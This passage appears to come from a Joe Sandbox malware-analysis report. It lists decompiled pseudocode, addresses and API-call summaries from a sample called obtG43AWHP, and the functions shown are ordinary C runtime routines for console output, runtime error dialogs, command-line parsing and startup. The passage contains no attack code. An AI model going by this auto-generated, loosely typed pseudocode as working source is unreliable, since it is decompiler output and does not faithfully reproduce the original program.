												__eflags = _t316 - _v6864 - _a12;
											} while (_t316 - _v6864 < _a12);
											goto L86;
										}
										_t318 = _v6864;
										__eflags = _a12 - _t325;
										if(_a12 <= _t325) {
											goto L91;
										} else {
											goto L49;
										}
										do {
											L49:
											_t359 = 0;
											_t337 = _t318 - _v6864;
											__eflags = _t337;
											_t256 =  &_v6844;
											do {
												__eflags = _t337 - _a12;
												if(_t337 >= _a12) {
													break;
												}
												_t350 =  *_t318;
												_t318 = _t318 + 1;
												_t337 = _t337 + 1;
												_v6884 = _t318;
												__eflags = _t350 - 0xa;
												if(_t350 == 0xa) {
													_v6868 =  &(_v6868->Internal);
													 *_t256 = 0xd;
													_t256 =  &(_t256[0]);
													_t359 = _t359 + 1;
													__eflags = _t359;
												}
												 *_t256 = _t350;
												_t256 =  &(_t256[0]);
												_t359 = _t359 + 1;
												__eflags = _t359 - 0x13ff;
											} while (_t359 < 0x13ff);
											_t355 = _t256 -  &_v6844;
											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
											__eflags = _t262;
											if(_t262 == 0) {
												goto L85;
											}
											_t263 = _v6876;
											_v6860 = _v6860 + _t263;
											__eflags = _t263 - _t355;
											if(_t263 < _t355) {
												goto L86;
											}
											__eflags = _t318 - _v6864 - _a12;
										} while (_t318 - _v6864 < _a12);
										goto L86;
									}
									__eflags = _t355;
									if(_t355 == 0) {
										L15:
										_t272 = GetConsoleCP();
										_t319 = _v6864;
										_v6884 = _t272;
										_v6872 = 0;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L87;
										}
										_v6852 = 0;
										do {
											_t274 = _v6853;
											__eflags = _t274;
											if(_t274 != 0) {
												__eflags = _t274 - 1;
												if(_t274 == 1) {
													L35:
													_t355 =  *_t319 & 0x0000ffff;
													__eflags = _t355 - 0xa;
													_t325 = 0 | _t355 == 0x0000000a;
													_t319 =  &(_t319[1]);
													_t81 =  &_v6852;
													 *_t81 = _v6852 + 2;
													__eflags =  *_t81;
													_v6848 = _t355;
													_v6888 = _t355 == 0xa;
													L36:
													__eflags = _t274 - 1;
													if(_t274 == 1) {
														L38:
														_t275 = E03007D97(_t325, _v6848);
														_pop(_t325);
														__eflags = _t275 - _v6848;
														if(_t275 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 2;
														__eflags = _v6888;
														if(_v6888 == 0) {
															goto L42;
														}
														_t277 = 0xd;
														_v6848 = _t277;
														_t278 = E03007D97(_t325, _t277);
														_pop(_t325);
														__eflags = _t278 - _v6848;
														if(_t278 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 1;
														_t94 =  &_v6868;
														 *_t94 =  &(_v6868->Internal);
														__eflags =  *_t94;
														goto L42;
													}
													__eflags = _t274 - 2;
													if(_t274 != 2) {
														goto L42;
													}
													goto L38;
												}
												__eflags = _t274 - 2;
												if(_t274 != 2) {
													goto L36;
												}
												goto L35;
											}
											_t341 =  *_t319;
											_t355 = _v6880;
											__eflags = _t341 - 0xa;
											_v6888 = 0 | _t341 == 0x0000000a;
											_t282 =  *_t355 + _t352;
											__eflags =  *(_t282 + 0x38);
											if( *(_t282 + 0x38) == 0) {
												_t284 = E03006B8D(_t341);
												__eflags = _t284;
												if(_t284 == 0) {
													_push(1);
													_push(_t319);
													L25:
													_push( &_v6848);
													_t286 = E03007EEF();
													_t362 = _t362 + 0xc;
													__eflags = _t286 - 0xffffffff;
													if(_t286 == 0xffffffff) {
														goto L86;
													}
													L26:
													_t319 =  &(_t319[0]);
													_v6852 = _v6852 + 1;
													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
													__eflags = _t355;
													if(_t355 == 0) {
														goto L86;
													}
													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
													__eflags = _t293;
													if(_t293 == 0) {
														goto L85;
													}
													_t325 = _v6868;
													_v6860 = _v6852 + _v6868;
													__eflags = _v6872 - _t355;
													if(_v6872 < _t355) {
														goto L86;
													}
													__eflags = _v6888;
													if(_v6888 == 0) {
														goto L42;
													}
													_v16 = 0xd;
													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L85;
													}
													__eflags = _v6872 - 1;
													if(_v6872 < 1) {
														goto L86;
													}
													_v6868 =  &(_v6868->Internal);
													_v6860 = _v6860 + 1;
													goto L42;
												}
												__eflags = _v6864 - _t319 + _a12 - 1;
												if(_v6864 - _t319 + _a12 <= 1) {
													_t350 =  *_t319;
													_v6860 = _v6860 + 1;
													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
													goto L86;
												}
												_t304 = E03007EEF( &_v6848, _t319, 2);
												_t362 = _t362 + 0xc;
												__eflags = _t304 - 0xffffffff;
												if(_t304 == 0xffffffff) {
													goto L86;
												}
												_t319 =  &(_t319[0]);
												_v6852 = _v6852 + 1;
												goto L26;
											}
											_t350 =  *((intOrPtr*)(_t282 + 0x34));
											_v16 =  *((intOrPtr*)(_t282 + 0x34));
											_v15 = _t341;
											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
											_push(2);
											_push( &_v16);
											goto L25;
											L42:
											__eflags = _v6852 - _a12;
										} while (_v6852 < _a12);
										goto L86;
									}
									__eflags = _v6853;
									if(_v6853 == 0) {
										goto L46;
									}
									goto L15;
								}
							}
							 *(E03003EB8()) =  *_t307 & 0x00000000;
							 *((intOrPtr*)(E03003EA5())) = 0x16;
							_t225 = E03003E53();
							goto L95;
						}
						__eflags = _t322 - 1;
						if(_t322 != 1) {
							goto L8;
						}
						goto L6;
					}
					 *(E03003EB8()) = 0;
					 *((intOrPtr*)(E03003EA5())) = 0x16;
					_t220 = E03003E53() | 0xffffffff;
					goto L98;
				}
				_t220 = 0;
				goto L98;
			}








































































    0x03005429
    0x03005429
    0x03005433
    0x03005438
    0x0300543f
    0x03005442
    0x03005446
    0x0300544a
    0x0300544c
    0x03005452
    0x03005458
    0x03005461
    0x0300546a
    0x0300546c
    0x03005494
    0x03005495
    0x0300549c
    0x030054a1
    0x030054aa
    0x030054ac
    0x030054b2
    0x030054b8
    0x030054bb
    0x030054c2
    0x030054c5
    0x030054c7
    0x030054ca
    0x030054e9
    0x030054e9
    0x030054ee
    0x030054f7
    0x030054fc
    0x030054fc
    0x03005500
    0x03005506
    0x03005508
    0x030057a7
    0x030057a7
    0x030057a7
    0x00000000
    0x0300550e
    0x03005510
    0x03005515
    0x00000000
    0x00000000
    0x0300551b
    0x03005525
    0x03005537
    0x03005539
    0x0300553f
    0x03005541
    0x03005543
    0x030057a9
    0x030057a9
    0x030057ab
    0x030057b0
    0x03005a6b
    0x03005a71
    0x03005a73
    0x03005a8a
    0x03005a90
    0x03005a96
    0x03005a96
    0x03005a9d
    0x03005b11
    0x03005b11
    0x03005b17
    0x03005b17
    0x03005b18
    0x03005b25
    0x03005b25
    0x03005a9f
    0x03005a9f
    0x03005aa6
    0x03005ad5
    0x03005adb
    0x03005add
    0x03005ae2
    0x03005af3
    0x03005af8
    0x03005afe
    0x03005b03
    0x03005b03
    0x03005b06
    0x03005b06
    0x00000000
    0x03005b06
    0x03005aea
    0x03005aed
    0x00000000
    0x00000000
    0x03005aef
    0x00000000
    0x03005aef
    0x03005aaa
    0x03005aab
    0x03005ab1
    0x03005acd
    0x03005ab3
    0x03005ab8
    0x03005abe
    0x03005ac3
    0x03005ac3
    0x00000000
    0x03005ab1
    0x03005a7b
    0x03005a82
    0x00000000
    0x03005a82
    0x030057b6
    0x030057bd
    0x030057c3
    0x03005871
    0x03005878
    0x03005951
    0x03005957
    0x0300595a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03005960
    0x03005960
    0x03005966
    0x0300596d
    0x0300596d
    0x03005975
    0x0300597b
    0x0300597c
    0x0300597c
    0x0300597f
    0x00000000
    0x00000000
    0x03005987
    0x0300598a
    0x03005990
    0x03005992
    0x03005995
    0x03005999
    0x0300599a
    0x0300599d
    0x0300599f
    0x0300599f
    0x0300599f
    0x0300599f
    0x030059a5
    0x030059ab
    0x030059ae
    0x030059b0
    0x030059b0
    0x030059bc
    0x030059d4
    0x030059e9
    0x030059eb
    0x030059ed
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x030059f3
    0x030059f3
    0x03005a14
    0x03005a1a
    0x03005a1c
    0x00000000
    0x00000000
    0x03005a1e
    0x03005a24
    0x03005a26
    0x00000000
    0x00000000
    0x03005a36
    0x03005a36
    0x03005a38
    0x00000000
    0x00000000
    0x00000000
    0x03005a38
    0x03005a30
    0x00000000
    0x03005a3a
    0x03005a40
    0x03005a46
    0x03005a4c
    0x03005a4c
    0x00000000
    0x03005a55
    0x0300587e
    0x03005884
    0x03005887
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0300588d
    0x0300588d
    0x0300588d
    0x03005896
    0x03005896
    0x0300589e
    0x030058a4
    0x030058a5
    0x030058a5
    0x030058a8
    0x00000000
    0x00000000
    0x030058aa
    0x030058ad
    0x030058af
    0x030058b1
    0x030058b7
    0x030058ba
    0x030058bc
    0x030058c4
    0x030058c5
    0x030058c8
    0x030058ce
    0x030058d0
    0x030058d0
    0x030058d0
    0x030058d0
    0x030058d6
    0x030058dc
    0x030058df
    0x030058e1
    0x030058e1
    0x030058f5
    0x03005913
    0x03005919
    0x0300591b
    0x00000000
    0x00000000
    0x03005921
    0x03005927
    0x0300592d
    0x0300592f
    0x00000000
    0x00000000
    0x0300593d
    0x0300593d
    0x00000000
    0x03005946
    0x030057c9
    0x030057cf
    0x030057d2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x030057d8
    0x030057d8
    0x030057da
    0x030057dc
    0x030057dc
    0x030057e2
    0x030057e8
    0x030057e8
    0x030057eb
    0x00000000
    0x00000000
    0x030057ed
    0x030057ef
    0x030057f0
    0x030057f1
    0x030057f7
    0x030057fa
    0x030057fc
    0x03005802
    0x03005805
    0x03005806
    0x03005806
    0x03005806
    0x03005807
    0x03005809
    0x0300580a
    0x0300580b
    0x0300580b
    0x0300581b
    0x03005839
    0x0300583f
    0x03005841
    0x00000000
    0x00000000
    0x03005847
    0x0300584d
    0x03005853
    0x03005855
    0x00000000
    0x00000000
    0x03005863
    0x03005863
    0x00000000
    0x0300586c
    0x03005549
    0x0300554b
    0x03005559
    0x03005559
    0x0300555f
    0x03005565
    0x0300556d
    0x03005573
    0x03005576
    0x00000000
    0x00000000
    0x0300557c
    0x03005582
    0x03005582
    0x03005588
    0x0300558a
    0x030056f7
    0x030056f9
    0x030056ff
    0x030056ff
    0x03005704
    0x03005707
    0x0300570a
    0x0300570d
    0x0300570d
    0x0300570d
    0x03005714
    0x0300571a
    0x03005720
    0x03005720
    0x03005722
    0x03005728
    0x0300572e
    0x03005733
    0x03005734
    0x0300573b
    0x00000000
    0x00000000
    0x03005741
    0x03005748
    0x0300574f
    0x00000000
    0x00000000
    0x03005753
    0x03005755
    0x0300575b
    0x03005760
    0x03005761
    0x03005768
    0x00000000
    0x00000000
    0x0300576e
    0x03005774
    0x03005774
    0x03005774
    0x00000000
    0x03005774
    0x03005724
    0x03005726
    0x00000000
    0x00000000
    0x00000000
    0x03005726
    0x030056fb
    0x030056fd
    0x00000000
    0x00000000
    0x00000000
    0x030056fd
    0x03005590
    0x03005592
    0x0300559a
    0x030055a0
    0x030055a8
    0x030055aa
    0x030055ae
    0x030055c9
    0x030055cf
    0x030055d1
    0x0300560d
    0x0300560f
    0x03005610
    0x03005616
    0x03005617
    0x0300561c
    0x0300561f
    0x03005622
    0x00000000
    0x00000000
    0x03005628
    0x03005642
    0x03005643
    0x0300564f
    0x03005651
    0x03005653
    0x00000000
    0x00000000
    0x03005672
    0x03005678
    0x0300567a
    0x00000000
    0x00000000
    0x03005686
    0x0300568e
    0x03005694
    0x0300569a
    0x00000000
    0x00000000
    0x030056a0
    0x030056a7
    0x00000000
    0x00000000
    0x030056c4
    0x030056cb
    0x030056d1
    0x030056d3
    0x00000000
    0x00000000
    0x030056d9
    0x030056e0
    0x00000000
    0x00000000
    0x030056e6
    0x030056ec
    0x00000000
    0x030056ec
    0x030055e1
    0x030055e3
    0x03005790
    0x03005792
    0x03005798
    0x0300579e
    0x00000000
    0x0300579e
    0x030055f3
    0x030055f8
    0x030055fb
    0x030055fe
    0x00000000
    0x00000000
    0x03005604
    0x03005605
    0x00000000
    0x03005605
    0x030055b0
    0x030055b3
    0x030055b6
    0x030055b9
    0x030055bd
    0x030055c2
    0x00000000
    0x0300577a
    0x0300577d
    0x0300577d
    0x00000000
    0x03005789
    0x0300554d
    0x03005553
    0x00000000
    0x00000000
    0x00000000
    0x03005553
    0x03005508
    0x030054d1
    0x030054d9
    0x030054df
    0x00000000
    0x030054df
    0x030054bd
    0x030054c0
    0x00000000
    0x00000000
    0x00000000
    0x030054c0
    0x03005473
    0x0300547a
    0x03005485
    0x00000000
    0x03005485
    0x03005463
    0x00000000

    APIs
    • __getptd.LIBCMT ref: 0300551B
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • GetConsoleMode.KERNEL32(?,?), ref: 03005539
    • GetConsoleCP.KERNEL32 ref: 03005559
      • Part of subcall function 03006B8D: __isleadbyte_l.LIBCMT ref: 03006B97
    • __Stoull.NTSTC_LIBCMT ref: 030055F3
    • __Stoull.NTSTC_LIBCMT ref: 03005617
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03005649
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005672
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 030056CB
      • Part of subcall function 03007D97: ___initconout.LIBCMT ref: 03007DA6
      • Part of subcall function 03007D97: WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,00000000,00000000), ref: 03007DC9
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005839
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005913
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 030059E3
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005A14
    • GetLastError.KERNEL32 ref: 03005A2A
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03005A6B
    • GetLastError.KERNEL32(?,03005BBB,?,?,?,030098B8,00000010,03002FCE,?,?,00000001,?,?,?,?), ref: 03005A8A
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
      • Part of subcall function 030052BA: SetFilePointer.KERNEL32(00000000,?,00000000,030034EA,?,?,?,?,?,030054FC,?,00000000,00000000,00000002,?,00000001), ref: 030052FC
      • Part of subcall function 030052BA: GetLastError.KERNEL32(?,030054FC,?,00000000,00000000,00000002,?,00000001,?,?,03005BBB,?,?,?,030098B8,00000010), ref: 03005309
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0300424F, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 148
    C-Code - Quality: 78%
    			E0300424F(void* __edx, void* _a4) {
				signed int _v8;
				struct HINSTANCE__* _v9;
				void _v508;
				long _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t23;
				short _t28;
				void* _t32;
				void* _t34;
				void* _t37;
				long _t38;
				void* _t39;
				struct HINSTANCE__* _t40;
				void* _t52;
				long _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				void* _t57;

				_t52 = __edx;
				_t18 =  *0x300bbe4; // 0xbb40e64e
				_v8 = _t18 ^ _t55;
				_t54 = _a4;
				_t53 = E03004229(_t54);
				_t40 = 0;
				_v512 = _t53;
				if(_t53 != 0) {
					if(E030076D8(3) == 1 || E030076D8(3) == 0 &&  *0x300b000 == 1) {
						_t54 = GetStdHandle(0xfffffff4);
						if(_t54 != _t40 && _t54 != 0xffffffff) {
							_t23 = 0;
							while(1) {
								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
									break;
								}
								_t23 = _t23 + 1;
								if(_t23 < 0x1f4) {
									continue;
								}
								break;
							}
							_v9 = _t40;
							_t20 = WriteFile(_t54,  &_v508, E03002C60( &_v508),  &_v512, _t40);
						}
					} else {
						if(_t54 != 0xfc) {
							_t53 = 0x300be08;
							_t28 = E03007675(0x300be08, 0x314, L"Runtime Error!\n\nProgram: ");
							_t57 = _t56 + 0xc;
							if(_t28 != 0) {
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								goto L9;
							} else {
								_t54 = 0x300be3a;
								 *0x300c042 = _t28;
								_t38 = GetModuleFileNameW(_t40, 0x300be3a, 0x104);
								_t40 = 0x2fb;
								if(_t38 == 0) {
									_t39 = E03007675(0x300be3a, 0x2fb, L"<program name unknown>");
									_t57 = _t57 + 0xc;
									if(_t39 != 0) {
										L8:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L9:
										E03003E01();
									}
								}
							}
							if(E0300765A(_t54) + 1 > 0x3c) {
								_t40 = _t40 - (0x300bdc4 + E0300765A(_t54) * 2 - _t54 >> 1);
								_t37 = E0300758D(0x300bdc4 + E0300765A(_t54) * 2, _t40, L"...", 3);
								_t57 = _t57 + 0x14;
								if(_t37 != 0) {
									goto L8;
								}
							}
							_t54 = 0x314;
							_t32 = E03007518(_t53, 0x314, L"\n\n");
							_t57 = _t57 + 0xc;
							if(_t32 != 0) {
								goto L8;
							}
							_t34 = E03007518(_t53, 0x314, _v512);
							_t57 = _t57 + 0xc;
							if(_t34 != 0) {
								goto L8;
							}
							_t20 = E030073AC(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return E03006BA0(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
			}

























    0x0300424f
    0x0300425a
    0x03004261
    0x03004266
    0x03004270
    0x03004272
    0x03004275
    0x0300427d
    0x0300428e
    0x030043a3
    0x030043a7
    0x030043ae
    0x030043b0
    0x030043b3
    0x030043be
    0x00000000
    0x00000000
    0x030043c0
    0x030043c6
    0x00000000
    0x00000000
    0x00000000
    0x030043c6
    0x030043d7
    0x030043e9
    0x030043e9
    0x030042ad
    0x030042b3
    0x030042c3
    0x030042c9
    0x030042ce
    0x030042d3
    0x03004391
    0x03004392
    0x03004393
    0x03004394
    0x03004395
    0x00000000
    0x030042d9
    0x030042de
    0x030042e5
    0x030042eb
    0x030042f1
    0x030042f8
    0x03004301
    0x03004306
    0x0300430b
    0x0300430d
    0x0300430f
    0x03004310
    0x03004311
    0x03004312
    0x03004313
    0x03004314
    0x03004314
    0x03004314
    0x0300430b
    0x030042f8
    0x03004324
    0x03004340
    0x03004344
    0x03004349
    0x0300434e
    0x00000000
    0x00000000
    0x0300434e
    0x03004355
    0x0300435c
    0x03004361
    0x03004366
    0x00000000
    0x00000000
    0x03004370
    0x03004375
    0x0300437a
    0x00000000
    0x00000000
    0x03004387
    0x0300438c
    0x030042b3
    0x0300428e
    0x030043fd

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,0300BE3A,00000104,00000001,00000000,?), ref: 030042EB
      • Part of subcall function 03003E01: GetCurrentProcess.KERNEL32(C0000417,03002BF3), ref: 03003E17
      • Part of subcall function 03003E01: TerminateProcess.KERNEL32(00000000), ref: 03003E1E
    • _wcslen.LIBCMT ref: 0300431A
    • _wcslen.LIBCMT ref: 03004327
      • Part of subcall function 030073AC: LoadLibraryW.KERNEL32(USER32.DLL), ref: 030073E7
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 03007403
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007414
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 03007421
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007424
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 03007431
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007434
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 03007441
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007444
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 03007455
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007458
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(00000000,0300BE08,00000314,00000000), ref: 0300747A
      • Part of subcall function 030073AC: DecodePointer.KERNEL32 ref: 03007484
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?,0300BE08,00000314,00000000), ref: 030074C3
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?), ref: 030074DD
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(0300BE08,00000314,00000000), ref: 030074F1
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 0300439D
    • _strlen.LIBCMT ref: 030043DA
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 030043E9
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 03002D14, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98
    C-Code - Quality: 56%
    			E03002D14() {
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t43;
				signed int _t45;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t59;
				intOrPtr _t60;
				void* _t61;

				_push(0x58);
				_push(0x3009808);
				E03005030(_t43, _t56, _t57);
				GetStartupInfoW(_t59 - 0x68);
				_t60 =  *0x301309c; // 0x0
				if(_t60 == 0) {
					__imp__HeapSetInformation(0, 1, 0, 0);
				}
				_t61 =  *0x3000000 - 0x5a4d; // 0x5a4d
				if(_t61 == 0) {
					_t22 =  *0x300003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t22 + 0x3000000)) - 0x4550;
					if( *((intOrPtr*)(_t22 + 0x3000000)) != 0x4550) {
						goto L3;
					} else {
						__eflags =  *((intOrPtr*)(_t22 + 0x3000018)) - 0x10b;
						if( *((intOrPtr*)(_t22 + 0x3000018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t22 + 0x3000074)) - 0xe;
							if( *((intOrPtr*)(_t22 + 0x3000074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t22 + 0x30000e8);
								_t8 =  *(_t22 + 0x30000e8) != 0;
								__eflags = _t8;
								 *(_t59 - 0x1c) = 0 | _t8;
							}
						}
					}
				} else {
					L3:
					 *(_t59 - 0x1c) = 0;
				}
				if(E03005004() == 0) {
					E03002CEB(0x1c);
				}
				if(E03004E89(_t43) == 0) {
					E03002CEB(0x10);
				}
				E03004B44();
				 *((intOrPtr*)(_t59 - 4)) = 0;
				_t26 = E030048FF();
				_t64 = _t26;
				if(_t26 < 0) {
					_push(0x1b);
					E0300420B(_t55, _t64);
				}
				 *0x3013098 = GetCommandLineW();
				 *0x300bdc4 = E030048A7();
				_t29 = E030047F9();
				_t65 = _t29;
				if(_t29 < 0) {
					_push(8);
					_t29 = E0300420B(_t55, _t65);
				}
